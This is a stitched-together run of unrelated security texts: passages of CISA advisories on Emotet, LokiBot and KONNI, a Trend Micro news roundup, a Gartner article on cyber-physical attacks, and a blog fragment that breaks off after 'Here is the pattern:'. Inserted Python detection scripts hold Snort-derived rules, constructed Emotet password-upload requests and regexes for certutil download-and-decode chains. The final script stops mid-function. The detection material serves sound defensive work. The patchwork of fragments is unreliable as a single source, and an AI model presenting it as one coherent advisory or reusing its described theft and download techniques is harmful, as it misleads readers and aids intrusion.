Cyber agencies and researchers alerted the public of surges of Emotet, including compromises in Canada, France, Japan, New Zealand, Italy, and the Netherlands. Emotet botnets were observed dropping Trickbot to deliver ransomware payloads against some victims and Qakbot Trojans to steal banking credentials and data from other targets.[5],[6],[7],[8]
Security researchers from Microsoft identified a pivot in tactics from the Emotet campaign. The new tactics include attaching password-protected archive files (e.g., Zip files) to emails to bypass email security gateways. These email messages purport to deliver documents created on mobile devices to lure targeted users into enabling macros to "view" the documents, an action which actually enables the delivery of malware.[9]
Palo Alto Networks reported cyber actors using thread hijacking to spread Emotet. This attack technique involves stealing an existing email chain from an infected host to reply to the chain, using a spoofed identity, and attaching a malicious document to trick recipients into opening the file.[10]

MITRE ATT&CK Techniques

According to MITRE, Emotet uses the ATT&CK techniques listed in table 1.

Table 1: ATT&CK techniques used by Emotet

Technique | Use
OS Credential Dumping: LSASS Memory [T1003.001] | Emotet has been observed dropping password grabber modules including Mimikatz.
Remote Services: SMB/Windows Admin Shares [T1021.002] | Emotet leverages the Admin$ share for lateral movement once the local admin password has been brute forced.
Obfuscated Files or Information [T1027] | Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, cmd.exe arguments, and PowerShell scripts.
Obfuscated Files or Information: Software Packing [T1027.002] | Emotet has used custom packers to protect its payloads.
Network Sniffing [T1040] | Emotet has been observed to hook network APIs to monitor network traffic.
Exfiltration Over C2 Channel [T1041] | Emotet has been seen exfiltrating system information stored within cookies sent within an HTTP GET request back to its command and control (C2) servers.
Windows Management Instrumentation [T1047] | Emotet has used WMI to execute powershell.exe.
Process Injection: Dynamic-link Library Injection [T1055.001] | Emotet has been observed injecting into Explorer.exe and other processes.
Process Discovery [T1057] | Emotet has been observed enumerating local processes.
Command and Scripting Interpreter: PowerShell [T1059.001] | Emotet has used PowerShell to retrieve the malicious payload and download additional resources like Mimikatz.
Command and Scripting Interpreter: Windows Command Shell [T1059.003] | Emotet has used cmd.exe to run a PowerShell script.
Command and Scripting Interpreter: Visual Basic [T1059.005] | Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.
Valid Accounts: Local Accounts [T1078.003] | Emotet can brute force a local admin password, then use it to facilitate lateral movement.
Account Discovery: Email Account [T1087.003] | Emotet has been observed leveraging a module that can scrape email addresses from Outlook.
Brute Force: Password Guessing [T1110.001] | Emotet has been observed using a hard-coded list of passwords to brute force user accounts.
Email Collection: Local Email Collection [T1114.001] | Emotet has been observed leveraging a module that scrapes email data from Outlook.
User Execution: Malicious Link [T1204.001] | Emotet has relied upon users clicking on a malicious link delivered through spearphishing.
User Execution: Malicious File [T1204.002] | Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing.
Exploitation of Remote Services [T1210] | Emotet has been seen exploiting SMB via a vulnerability exploit like ETERNALBLUE (MS17-010) to achieve lateral movement and propagation.
Create or Modify System Process: Windows Service [T1543.003] | Emotet has been observed creating new services to maintain persistence.
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001] | Emotet has been observed adding the downloaded payload to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key to maintain persistence.
Scheduled Task/Job: Scheduled Task [T1053.005] | Emotet has maintained persistence through a scheduled task.
Unsecured Credentials: Credentials In Files [T1552.001] | Emotet has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user.
Credentials from Password Stores: Credentials from Web Browsers [T1555.003] | Emotet has been observed dropping browser password grabber modules.
Archive Collected Data [T1560] | Emotet has been observed encrypting the data it collects before sending it to the C2 server.
Phishing: Spearphishing Attachment [T1566.001] | Emotet has been delivered by phishing emails containing attachments.
Phishing: Spearphishing Link [T1566.002] | Emotet has been delivered by phishing emails containing links.
Non-Standard Port [T1571] | Emotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/Hypertext Transfer Protocol Secure.
Encrypted Channel: Asymmetric Cryptography [T1573.002] | Emotet is known to use RSA keys for encrypting C2 traffic.

Detection

Signatures

MS-ISAC developed the following Snort signature for use in detecting network activity associated with Emotet activity.

alert tcp $HOME_NET any -> $EXTERNAL_NET 443 (msg:"[CIS] Emotet C2 Traffic Using Form Data to Send Passwords"; content:"POST"; http_method; content:"Content-Type|3a 20|multipart/form-data|3b 20|boundary="; http_header; fast_pattern; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|"; http_client_body; content:!"------WebKitFormBoundary"; http_client_body; content:!"Cookie|3a|"; pcre:"/:?(chrome|firefox|safari|opera|ie|edge) passwords/i"; reference:url,cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/; sid:1; rev:2;)

CISA developed the following Snort signatures for use in detecting network activity associated with Emotet activity. Note: Uniform Resource Identifiers should contain a random length alphabetical multiple directory string, and activity will likely be over ports 80, 8080, or 443.

alert tcp any any -> any $HTTP_PORTS (msg:"EMOTET:HTTP URI GET contains '/wp-content/###/'"; sid:00000000; rev:1; flow:established,to_server; content:"/wp-content/"; http_uri; content:"/"; http_uri; distance:0; within:4; content:"GET"; nocase; http_method; urilen:<17; classtype:http-uri; content:"Connection|3a 20|Keep-Alive|0d 0a|"; http_header; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"EMOTET:HTTP URI GET contains '/wp-admin/###/'"; sid:00000000; rev:1; flow:established,to_server; content:"/wp-admin/"; http_uri; content:"/"; http_uri; distance:0; within:4; content:"GET"; nocase; http_method; urilen:<15; content:"Connection|3a 20|Keep-Alive|0d 0a|"; http_header; classtype:http-uri; metadata:service http;)
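The three signatures above, plus the C2 request shape from the Technical Details section (POST to nested, purely alphabetical directories with the quoted user agent), re-expressed as Python matching over parsed HTTP requests. This is an added example, not CISA's or MS-ISAC's code; it is useful for running the same logic over a proxy log or a pcap export offline and for seeing exactly what each rule does and does not match (for instance, that within:4 after "/wp-content/" means at most three characters before the next slash). The requests below are constructed, and the user-agent prefix is the truncated string quoted in the alert.

```python
"""Python rendition of the Snort signatures above plus the C2 URI shape the
alert describes. Added example, not CISA's or MS-ISAC's code; the requests
below are constructed, not captured traffic."""
import re

# Truncated user agent as quoted in the alert, used as a prefix match.
EMOTET_UA_PREFIX = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; "
                    "Trident/7.0; SLCC2;")
PASSWORDS_RE = re.compile(r":?(chrome|firefox|safari|opera|ie|edge) passwords", re.I)
ALPHA_DIRS_RE = re.compile(r"^(?:/[A-Za-z]+){2,}/?$")


def _headers(req):
    return {k.lower(): v for k, v in req["headers"].items()}


def rule_cis_form_data_passwords(req):
    """MS-ISAC rule: POST multipart/form-data carrying a '<browser> passwords'
    part, without the WebKitFormBoundary or Cookie: strings a browser would send."""
    h, body = _headers(req), req["body"]
    return (req["method"] == "POST"
            and h.get("content-type", "").startswith("multipart/form-data; boundary=")
            and 'Content-Disposition: form-data; name="' in body
            and "------WebKitFormBoundary" not in body
            and "Cookie:" not in body
            and PASSWORDS_RE.search(body) is not None)


def rule_emotet_wp_uri(req, prefix, max_urilen):
    """CISA rules: short GET whose URI contains '<prefix><0-3 chars>/' (that is
    what content "/" with distance:0; within:4 means) and 'Connection: Keep-Alive'."""
    pat = re.compile(re.escape(prefix) + r"[^/]{0,3}/")
    return (req["method"] == "GET"
            and len(req["uri"]) < max_urilen
            and pat.search(req["uri"]) is not None
            and _headers(req).get("connection") == "Keep-Alive")


def rule_emotet_c2_post_shape(req):
    """The C2 shape from the alert text: POST to nested, purely alphabetical
    directories with the quoted user agent. Heuristic: confirm the destination
    against threat intel before acting, ordinary sites can have such paths."""
    return (req["method"] == "POST"
            and ALPHA_DIRS_RE.match(req["uri"]) is not None
            and _headers(req).get("user-agent", "").startswith(EMOTET_UA_PREFIX))


def classify(req):
    """Names of the rules a single parsed request matches."""
    hits = []
    if rule_cis_form_data_passwords(req):
        hits.append("cis-emotet-form-data-passwords")
    if rule_emotet_wp_uri(req, "/wp-content/", 17):
        hits.append("emotet-uri-wp-content")
    if rule_emotet_wp_uri(req, "/wp-admin/", 15):
        hits.append("emotet-uri-wp-admin")
    if rule_emotet_c2_post_shape(req):
        hits.append("emotet-c2-post-shape")
    return hits


def classify_all(reqs):
    return {name: classify(req) for name, req in reqs.items()}


# Constructed requests (not captured traffic). Host/IP values are documentation ranges.
UA = EMOTET_UA_PREFIX + " .NET CLR 2.0.50727)"
SAMPLE_REQUESTS = {
    "c2_post": {"method": "POST", "uri": "/kxfQw/ZmNkqPl/",
                "headers": {"Host": "203.0.113.7:8080", "User-Agent": UA,
                            "Content-Type": "application/x-www-form-urlencoded"},
                "body": "a=b"},
    "password_upload": {"method": "POST", "uri": "/abc/defgh/",
                        "headers": {"User-Agent": UA,
                                    "Content-Type": "multipart/form-data; boundary=bnd"},
                        "body": ('--bnd\r\nContent-Disposition: form-data; name="file"; '
                                 'filename="Chrome Passwords.txt"\r\n\r\nuser:pass\r\n--bnd--\r\n')},
    "wp_content_loader": {"method": "GET", "uri": "/wp-content/Ab/",
                          "headers": {"Connection": "Keep-Alive"}, "body": ""},
    "wp_admin_loader": {"method": "GET", "uri": "/wp-admin/xy/",
                        "headers": {"Connection": "Keep-Alive"}, "body": ""},
    "benign_plugin": {"method": "GET", "uri": "/wp-content/plugins/x.js",
                      "headers": {"Connection": "Keep-Alive"}, "body": ""},
    "benign_browser_upload": {"method": "POST", "uri": "/upload",
                              "headers": {"Content-Type":
                                          "multipart/form-data; boundary=----WebKitFormBoundaryx"},
                              "body": ('------WebKitFormBoundaryx\r\nContent-Disposition: '
                                       'form-data; name="f"\r\n\r\nmy firefox passwords\r\n'
                                       '------WebKitFormBoundaryx--\r\n')},
}

if __name__ == "__main__":
    for name, hits in classify_all(SAMPLE_REQUESTS).items():
        print(f"{name:24s} {hits or 'clean'}")
```

The benign browser upload shows why the two negative content matches are in the MS-ISAC rule: a real browser form post announces itself with a WebKitFormBoundary marker and usually a Cookie header, and the Emotet module does neither, so the rule keys on their absence rather than on the payload alone.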

Mitigations

CISA and MS-ISAC recommend that network defenders—in federal, state, local, tribal, territorial governments, and the private sector—consider applying the following best practices to strengthen the security posture of their organization’s systems. System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.

Block email attachments commonly associated with malware (e.g., .dll and .exe).
Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).
Implement Group Policy Object and firewall rules.
Implement an antivirus program and a formalized patch management process.
Implement filters at the email gateway, and block suspicious IP addresses at the firewall.
Adhere to the principle of least privilege.
Implement a Domain-Based Message Authentication, Reporting & Conformance validation system.
Segment and segregate networks and functions.
Limit unnecessary lateral communications.
Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Enforce multi-factor authentication.
Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See Using Caution with Email Attachments.
Enable a firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
Monitor users’ web browsing habits; restrict access to suspicious or risky sites.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).
Scan all software downloaded from the internet prior to executing.
Maintain situational awareness of the latest threats and implement appropriate access control lists.
Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.
See CISA’s Alert on Technical Approaches to Uncovering and Remediating Malicious Activity for more information on addressing potential incidents and applying best practice incident response procedures.
See the joint CISA and MS-ISAC Ransomware Guide on how to be proactive and prevent ransomware attacks from happening and for a detailed approach on how to respond to an attack and best resolve the cyber incident.

For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops.

Resources

MS-ISAC Security Event Primer – Emotet
CISA Alert TA18-201A – Emotet Malware
MITRE ATT&CK – Emotet
MITRE ATT&CK for Enterprise
References
Revisions
October 6, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: October 1, 2020

The Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Defense (DOD) Cyber National Mission Force (CNMF) have identified a malware variant—referred to as SLOTHFULMEDIA—used by a sophisticated cyber actor. In addition, U.S. Cyber Command has released the malware sample to the malware aggregation tool and repository, VirusTotal.

CISA encourages users and administrators to review Malware Analysis Report MAR-10303705-1.v1 and U.S. Cyber Command’s VirusTotal page for more information.



Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how threat actors are bundling Windscribe VPN installers with backdoors. Also, read about a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications.

Read on:


Windows Backdoor Masquerading as VPN App Installer

This article discusses findings covered in a recent blog from Trend Micro where company researchers warn that Windows users looking to install a VPN app are in danger of downloading one that’s been bundled with a backdoor. The trojanized package in this specific case is the Windows installer for Windscribe VPN and contains the Bladabindi backdoor.

The Evolution of Malicious Shell Scripts

The Unix-programming community commonly uses shell scripts as a simple way to execute multiple Linux commands from a single file. Many users do this as part of a regular operational workload: manipulating files, executing programs and printing text. However, because a shell interpreter is available on every Unix machine, it is also an attractive and flexible tool for malicious actors to abuse.

Microsoft Says It Detected Active Attacks Leveraging Zerologon Vulnerability

Hackers are actively exploiting the Zerologon vulnerability in real-world attacks, Microsoft’s security intelligence team said on Thursday morning. The attacks were expected to happen, according to security industry experts. Multiple versions of weaponized proof-of-concept exploit code have been published online in freely downloadable form since details about the Zerologon vulnerability were revealed on September 14 by Dutch security firm Secura BV.

Stretched and Stressed: Best Practices for Protecting Security Workers’ Mental Health

Security work is stressful under the best of circumstances, but remote work presents its own challenges. In this article, learn how savvy security leaders can best support their teams today — wherever they’re working. Trend Micro’s senior director of HR for the Americas, Bob Kedrosky, weighs in on how Trend Micro is supporting its remote workers.

Exploitable Flaws Found in Facial Recognition Devices

To gain a more nuanced understanding of the security issues present in facial recognition devices, Trend Micro analyzed the security of four different models: ZKTeco FaceDepot-7B, Hikvision DS-K1T606MF, Telpo TPS980 and Megvii Koala. Trend Micro’s case studies show how these devices can be misused by malicious attackers.

New ‘Alien’ Malware Can Steal Passwords from 226 Android Apps

Security researchers have discovered and analyzed a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications. Named Alien, this new trojan has been active since the start of the year and has been offered as a Malware-as-a-Service (MaaS) offering on underground hacking forums.

Government Software Provider Tyler Technologies Hit by Possible Ransomware Attack

Tyler Technologies, a Texas-based provider of software and services for the U.S. government, started informing customers this week of a security incident that is believed to have involved a piece of ransomware. Tyler’s website is currently unavailable and in emails sent out to customers the company said its internal phone and IT systems were accessed without authorization by an “unknown third party.”

U.S. Justice Department Charges APT41 Hackers Over Global Cyberattacks

On September 16, 2020, the United States Justice Department announced that it was charging five Chinese citizens with hacking crimes committed against over 100 institutions in the United States and abroad. The global hacking campaign went after a diverse range of targets, from video game companies and telecommunications enterprises to universities and non-profit organizations. The five individuals were reportedly connected to the hacking group known as APT41.

Phishers are Targeting Employees with Fake GDPR Compliance Reminders

Phishers are using a bogus GDPR compliance reminder to trick recipients – employees of businesses across several industry verticals – into handing over their email login credentials. In this evolving campaign, the attackers targeted mostly email addresses they could glean from company websites and, to a lesser extent, emails of people who are high in the organization’s hierarchy.

Mispadu Banking Trojan Resurfaces

Recent spam campaigns leading to the URSA/Mispadu banking trojan have been uncovered, as reported by malware analyst Pedro Tavares in a Twitter post and by Seguranca Informatica in a blog post. Mispadu malware steals credentials from users’ systems. This attack targets systems with Spanish and Portuguese as system languages.

A Blind Spot in ICS Security: The Protocol Gateway Part 3: What ICS Security Administrators Can Do

In this blog series, Trend Micro analyzes the impacts of the serious vulnerabilities detected in the protocol gateways that are essential when shifting to smart factories and discusses the security countermeasures that security administrators in those factories must take. In the final part of this series, Trend Micro describes a stealth attack method that abuses a vulnerability as well as informs readers of a vital point of security measures required for the future ICS environment.

Major Instagram App Bug Could’ve Given Hackers Remote Access to Your Phone

Check Point researchers disclosed details about a critical vulnerability in Instagram’s Android app that could have allowed remote attackers to take control over a targeted device just by sending victims a specially crafted image. The flaw lets attackers perform actions on behalf of the user within the Instagram app, including spying on victim’s private messages and deleting or posting photos from their accounts, as well as execute arbitrary code on the device.

Addressing Threats Like Ryuk via Trend Micro XDR

Ryuk has recently been one of the most noteworthy ransomware families and is perhaps the best representation of the new paradigm in ransomware attacks where malicious actors go for quality over sheer quantity. In 2019, the Trend Micro™ Managed XDR and Incident Response teams investigated an incident concerning a Trend Micro customer that was infected with the Ryuk ransomware.

What are your thoughts on the Android Instagram app bug that could allow remote access to user’s phones? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybercriminals Distribute Backdoor with VPN Installer and New ‘Alien’ Malware can Steal Passwords from 226 Android Apps appeared first on .

Original release date: September 22, 2020

Summary

This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise frameworks for all referenced threat actor techniques.

This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions by the Multi-State Information Sharing & Analysis Center (MS-ISAC).

CISA has observed a notable increase in the use of LokiBot malware by malicious cyber actors since July 2020. Throughout this period, CISA’s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected persistent malicious LokiBot activity. LokiBot is credential- and information-stealing malware, often sent as a malicious attachment; it is known for being simple yet effective, which makes it an attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases.

Technical Details

LokiBot—also known as Lokibot, Loki PWS, and Loki-bot—is Trojan malware that steals sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials.

The malware steals credentials through the use of a keylogger to monitor browser and desktop activity (Credentials from Password Stores [T1555]; Credentials from Password Stores: Credentials from Web Browsers [T1555.003]; Input Capture: Keylogging [T1056.001]).

LokiBot can also create a backdoor into infected systems to allow an attacker to install additional payloads (Event Triggered Execution: Accessibility Features [T1546.008]).
Malicious cyber actors typically use LokiBot to target Windows and Android operating systems and distribute the malware via email, malicious websites, text, and other private messages (User Execution: Malicious File [T1204.002]). See figure 1 for enterprise techniques used by LokiBot.

Figure 1: MITRE ATT&CK enterprise techniques used by LokiBot

Since LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications, including the following.

February 2020: Trend Micro identified cyber actors using LokiBot to impersonate a launcher for Fortnite—a popular video game.[1]
August 2019: FortiGuard SE researchers discovered a malspam campaign distributing LokiBot information-stealing payloads in a spearphishing attack on a U.S. manufacturing company.[2]
August 2019: Trend Micro researchers reported LokiBot malware source code being hidden in image files spread as attachments in phishing emails.[3]
June 2019: Netskope uncovered LokiBot being distributed in a malspam campaign using ISO image file attachments.[4]
April 2019: Netskope uncovered a phishing campaign using malicious email attachments with LokiBot malware to create backdoors onto infected Windows systems and steal sensitive information.[5]
February 2018: Trend Micro discovered CVE-2017-11882 being exploited in an attack using the Windows Installer service to deliver LokiBot malware.[6]
October 2017: SfyLabs identified cyber actors using LokiBot as an Android banking trojan that turns into ransomware.[7]
May 2017: Fortinet reported malicious actors using a PDF file to spread a new LokiBot variant capable of stealing credentials from more than 100 different software tools.[8]
March 2017: Check Point discovered LokiBot malware pre-installed on Android devices.[9]
December 2016: Dr.Web researchers identified a new LokiBot variant targeting Android core libraries.[10]
February 2016: Researchers discovered the LokiBot Android Trojan infecting the core Android operating system processes.[11]

MITRE ATT&CK Techniques

According to MITRE, LokiBot uses the ATT&CK techniques listed in table 1.

Table 1: LokiBot ATT&CK techniques

Technique

Use

System Network Configuration Discovery [T1016]

LokiBot has the ability to discover the domain name of the infected host.

Obfuscated Files or Information [T1027]

LokiBot has obfuscated strings with base64 encoding.

Obfuscated Files or Information: Software Packing [T1027.002]

LokiBot has used several packing methods for obfuscation.

System Owner/User Discovery [T1033]

LokiBot has the ability to discover the username on the infected host.

Exfiltration Over C2 Channel [T1041]

LokiBot has the ability to initiate contact with command and control to exfiltrate stolen data.

Process Injection: Process Hollowing [T1055.012]

LokiBot has used process hollowing to inject into legitimate Windows process vbc.exe.

Input Capture: Keylogging [T1056.001]

LokiBot has the ability to capture input on the compromised host via keylogging.

Application Layer Protocol: Web Protocols [T1071.001]

LokiBot has used Hypertext Transfer Protocol for command and control.

System Information Discovery [T1082]

LokiBot has the ability to discover the computer name and Windows product name/version.

User Execution: Malicious File [T1204.002]

LokiBot has been executed through malicious documents contained in spearphishing emails.

Credentials from Password Stores [T1555]

LokiBot has stolen credentials from multiple applications and data sources including Windows operating system credentials, email clients, File Transfer Protocol, and Secure File Transfer Protocol clients.

Credentials from Password Stores: Credentials from Web Browsers [T1555.003]

LokiBot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and Chromium and Mozilla Firefox-based web browsers.

Hide Artifacts: Hidden Files and Directories [T1564.001]

LokiBot has the ability to copy itself to a hidden file and directory.

Detection

Signatures

CISA developed the following Snort signature for use in detecting network activity associated with LokiBot activity.

alert tcp any any -> any $HTTP_PORTS (msg:"Lokibot:HTTP URI POST contains '/*/fre.php' post-infection"; flow:established,to_server; flowbits:isnotset,.tagged; content:"/fre.php"; http_uri; fast_pattern:only; urilen:<50,norm; content:"POST"; nocase; http_method; pcre:"/\/(?:alien|lokyd|donep|jemp|lokey|new2|loki|Charles|sev7n|dbwork|scroll\/NW|wrk|job|fived?|donemy|animationdkc|love|Masky|vd|lifetn|Ben)\/fre\.php$/iU"; flowbits:set,.tagged; classtype:http-uri; metadata:service http; metadata:pattern HTTP-P001,)

Mitigations

CISA and MS-ISAC recommend that federal, state, local, tribal, territorial government, private sector users, and network administrators consider applying the following best practices to strengthen the security posture of their organization’s systems. System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.

Maintain up-to-date antivirus signatures and engines. See Protecting Against Malicious Code.
Keep operating system patches up to date. See Understanding Patches and Software Updates.
Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Enforce multi-factor authentication. See Supplementing Passwords for more information.
Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators’ group unless required.
Enforce a strong password policy. See Choosing and Protecting Passwords.
Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See Using Caution with Email Attachments.
Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).
Scan all software downloaded from the internet prior to executing.
Maintain situational awareness of the latest threats and implement appropriate access control lists.
Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.

For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops.

Resources

Center for Internet Security Security Event Primer – Malware: https://www.cisecurity.org/white-papers/security-event-primer-malware/
MITRE ATT&CK – LokiBot: https://attack.mitre.org/software/S0447/
MITRE ATT&CK for Enterprise: https://attack.mitre.org/matrices/enterprise/

References
[1] Trend Micro: LokiBot Impersonates Popular Game Launcher and Drops Compiled C# Code File
[2] Fortinet: Newly Discovered Infostealer Attack Uses LokiBot
[3] ZDNet: LokiBot Malware Now Hides its Source Code in Image Files
[4] SecurityWeek: LokiBot and NanoCore Malware Distributed in ISO Image Files
[5] Netskope: LokiBot & NanoCore being distributed via ISO disk image files
[6] Trend Micro: Attack Using Windows Installer Leads to LokiBot
[7] BleepingComputer: LokiBot Android Banking Trojan Turns Into Ransomware When You Try to Remove It
[8] Fortinet: New Loki Variant Being Spread via PDF File
[9] Check Point: Preinstalled Malware Targeting Mobile Users
[10] BleepingComputer: Loki Trojan Infects Android Libraries and System Process to Get Root Privileges
[11] New Jersey Cybersecurity & Communications Integration Cell: LokiBot

Revisions
September 22, 2020: Initial Version



Using knowledge from the ‘cyber frontline’ to improve our ‘Mitigating malware and ransomware’ guidance.

Gartner predicts the financial impact of cyber attacks resulting in fatal casualties will reach more than US$50 billion by 2023
As more physical industrial sites become connected, leaders themselves will be accountable for their security and safety 

In the age of Industry 4.0 and connected industry, we often discuss the relatively new and growing threat of cyber attacks in the context of financial damage. Ransomware, for example, can jam a steel crowbar into operations, leading to downtime, and subsequently hemorrhaging costs. 

As physical industries become connected and therefore vulnerable to attacks, they face the same risks as every other digital organization. 


But that’s not quite the extent of it. As warehouses, factories, power plants, and other physical facilities are further laden with sensor-based predictive analytics, remote access technologies, control networks, robotics, and other operational technology (OT), system attacks can quickly lead to physical harm to people, destruction of property or environmental disasters.

Previous malware attacks have demonstrated this potential. The Triton malware was found infecting safety systems in Saudi petrochemical plants in 2017. It gave attackers the ability to remotely shut off fail-safe systems in case there was a poisonous-gas leak or a critical failure — the last layer of defense before human life was at risk. 

There have been spear-phishing attacks on members of the US energy sector, allegedly by North Korean hackers; the attempts were thwarted but could easily have led to attacks that devastate the country's infrastructure. As far back as 2015, a hack of Ukraine's power grid caused a blackout affecting 200,000 people, while Kaspersky Labs estimates that over 40% of the ICS computers it monitors were attacked by malware at least once in the first half of 2018.

In 2014, it was reported that the hacking of a control system for a steel mill in Germany meant a blast furnace could not be shut down, leading to "massive" damage to the plant, but no reported loss of life.

Cyber-physical system (CPS) incidents of this kind are fortunately rare, but they are set to increase rapidly in the coming years because of a lack of security focus and spending. If business leaders don't act, they could be held personally accountable when something goes wrong.


Industrial robots are welding metal part in factory. Source: Shutterstock

The cyber-physical security threat

Gartner defines CPS as systems engineered to orchestrate sensing, computation, control, networking, and analytics to interact with the physical world — including humans. 

They underpin all connected IT, operational technology (OT), and Internet of Things (IoT) efforts where security considerations span both the cyber and physical worlds, such as asset-intensive, critical infrastructure, and clinical healthcare environments.

Gartner predicts that as this type of threat increases, business leaders will be caught off guard as liability for CPS incidents will “pierce the corporate veil” to personal liability for 75% of CEOs by 2024.

“Soon, CEOs won’t be able to plead ignorance or retreat behind insurance policies,” said Katell Thielemann, research vice president at Gartner. “Regulators and governments will react promptly to an increase in serious incidents resulting from failure to secure CPSs, drastically increasing rules and regulations governing them.

“In the U.S., the FBI, NSA and Cybersecurity and Infrastructure Security Agency (CISA) have already increased the frequency and details provided around threats to critical infrastructure-related systems, most of which are owned by private industry.”

Gartner predicts that the financial impact of CPS attacks resulting in fatal casualties will reach more than US$50 billion by 2023. The firm warns that, even with the actual value of human life in the equation, associated costs for organizations in terms of compensation, litigation, insurance, regulatory fines, and reputation loss will be significant. 

“Technology leaders need to help CEOs understand the risks that CPSs represent and the need to dedicate focus and budget to securing them,” said Thielemann. “The more connected CPSs are, the higher the likelihood of an incident occurring.”


With OT, smart buildings, smart cities, connected cars, and autonomous vehicles evolving, incidents in the digital world will have a much greater effect in the physical world as risks, threats and vulnerabilities now exist in a bidirectional, cyber-physical spectrum.

However, many enterprises are not aware of CPSs already deployed in their organization, either due to legacy systems connected to enterprise networks by teams outside of IT or because of new business-driven automation and modernization efforts.

The post CEOs will be held accountable for ‘killer’ malware in future, says Gartner appeared first on TechHQ.


During the weekend, I found several samples from the same VBA macro. The only difference between all the samples was the URL to fetch a malicious PE file. I have a specific YARA rule to search for embedded PowerShell strings and my rule fired several times with the same pattern and similar size. Here is the pattern:


Original release date: August 14, 2020

Summary

This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.

The Cybersecurity and Infrastructure Security Agency (CISA) has observed cyber actors using emails containing a Microsoft Word document with a malicious Visual Basic Application (VBA) macro code to deploy KONNI malware. KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts.

Technical Details

KONNI malware is often delivered via phishing emails as a Microsoft Word document with malicious VBA macro code (Phishing: Spearphishing Attachment [T1566.001]). The malicious code can change the font color from light grey to black (to trick the user into enabling content), check whether the Windows operating system is a 32-bit or 64-bit version, and construct and execute the command line to download additional files (Command and Scripting Interpreter: Windows Command Shell [T1059.003]).

Once the VBA macro has constructed the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator. CertUtil also has a built-in function to decode base64-encoded files. The command line silently copies certutil.exe into a temp directory and renames it to evade detection.

The cyber actor then downloads a text file from a remote resource containing a base64-encoded string, which is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.
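The chain above (copy and rename CertUtil, download, decode, run the batch file) can be surfaced from process-creation telemetry. The following is an added example written for this page, not code from CISA or the advisory: it runs a handful of checks over constructed Sysmon-style event records. The process names, paths, the renamed copy ct.exe and the host c2.example are assumptions made for the sample.

```python
"""Added example: flag the KONNI-style certutil chain described above in
process-creation telemetry. Event records, paths and the download host are
constructed for illustration; nothing here is taken from a real incident."""
import re
from pathlib import PureWindowsPath

# Patterns for the stages the advisory describes. Windows paths and switches are
# case-insensitive, and '-' is not a word character, so whitespace rather than
# \b delimits the certutil switches.
COPY_CERTUTIL = re.compile(r"\bcopy\b.*\bcertutil\.exe\b.*\\temp\\", re.I)
CERTUTIL_DOWNLOAD = re.compile(r"(?:^|\s)-urlcache\b.*\s-f\s", re.I)
CERTUTIL_DECODE = re.compile(r"(?:^|\s)-decode\b", re.I)
TEMP_BATCH = re.compile(r"\\temp\\[^\s\"]+\.bat\b", re.I)
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}


def analyse(events):
    """Return (ProcessId, stage) findings for one host's process-creation events.

    Each event is a dict with Sysmon-like keys: ProcessId, Image, ParentImage,
    OriginalFileName (from the PE version resource) and CommandLine.
    """
    findings = []
    for ev in events:
        image = PureWindowsPath(ev["Image"]).name.lower()
        parent = PureWindowsPath(ev.get("ParentImage", "")).name.lower()
        original = ev.get("OriginalFileName", "").lower()
        cmd = ev.get("CommandLine", "")
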